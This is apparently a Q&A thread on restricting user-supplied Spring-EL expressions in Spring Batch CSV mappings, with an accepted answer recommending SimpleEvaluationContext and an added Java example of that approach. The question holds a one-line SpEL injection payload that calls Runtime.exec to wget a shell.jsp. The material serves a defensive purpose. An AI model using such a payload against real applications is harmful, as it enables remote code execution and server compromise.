Can Spring-EL expressions be executed within a sandbox?
I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very well, but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefore it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find anything related to this topic. Or maybe Spring-EL is not the right choice for the job?



Example of what I try to achieve:



name: column[0]
category: concat(' ', column[18], column[19])
age: split(column[3], '/', 0)
  • docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06
  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01
spring sandbox spring-el
edited Nov 19 at 15:08
asked Nov 19 at 15:03
Mark Ebbers
1 Answer
accepted
The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.
        answered Nov 19 at 16:04
        Artem Bilan
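A worked version of the CSV mapping the question describes, evaluated through the SimpleEvaluationContext the answer recommends, so the restricted context is applied to the same `column[...]` expressions and the same `T(...)` type reference from the question. This is added example code, not from the question, the answer or the Spring project; it assumes a hypothetical `Row` root class with a `column` getter, registers `concat` and `split` as SpEL functions (which SpEL calls with a leading `#`), and shortens the column indices to fit a four-cell constructed record.

```java
import java.util.Arrays;
import java.util.List;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

public class SandboxedCsvMapping {
    /** Hypothetical root object: one CSV record, exposed as the read-only property "column". */
    public static class Row {
        private final List<String> column;
        public Row(String... cells) { this.column = Arrays.asList(cells); }
        public List<String> getColumn() { return column; }
    }

    /** Allow-listed helpers; SpEL reaches registered functions as #concat(...) and #split(...). */
    public static String concat(String sep, String a, String b) { return a + sep + b; }
    public static String split(String s, String regex, int idx) { return s.split(regex)[idx]; }

    /** Restricted context: no T() type references, constructors or @bean references, read-only
     *  property access, and only the two static helpers above reachable by name. */
    public static EvaluationContext sandbox() throws NoSuchMethodException {
        SimpleEvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        // #fn() references resolve through variable lookup, so no MethodResolver is enabled
        ctx.setVariable("concat", SandboxedCsvMapping.class.getMethod("concat", String.class, String.class, String.class));
        ctx.setVariable("split", SandboxedCsvMapping.class.getMethod("split", String.class, String.class, int.class));
        return ctx;
    }

    public static void main(String[] args) throws Exception {
        ExpressionParser parser = new SpelExpressionParser();
        EvaluationContext ctx = sandbox();
        Row row = new Row("Alice", "1990/05/01", "Home", "Garden");   // constructed sample record
        String[] userMapping = {                       // the user-supplied mapping configuration
            "column[0]",                               // name
            "#concat(' ', column[2], column[3])",      // category
            "#split(column[1], '/', 0)",               // birth year
            "T(java.lang.Runtime)"                     // type reference: refused by the sandbox
        };
        for (String expr : userMapping) {
            try {
                Object value = parser.parseExpression(expr).getValue(ctx, row, Object.class);
                System.out.println(expr + " -> " + value);
            } catch (ExpressionException e) {          // parse errors and refused constructs alike
                System.out.println(expr + " -> REJECTED: " + e.getMessage());
            }
        }
    }
}
```

Calling `.withInstanceMethods()` on the builder, as the comment above does, additionally allows `column[1].split('/')[0]`-style calls on any bound object; registering static helper functions as shown keeps the callable surface to an explicit allow-list.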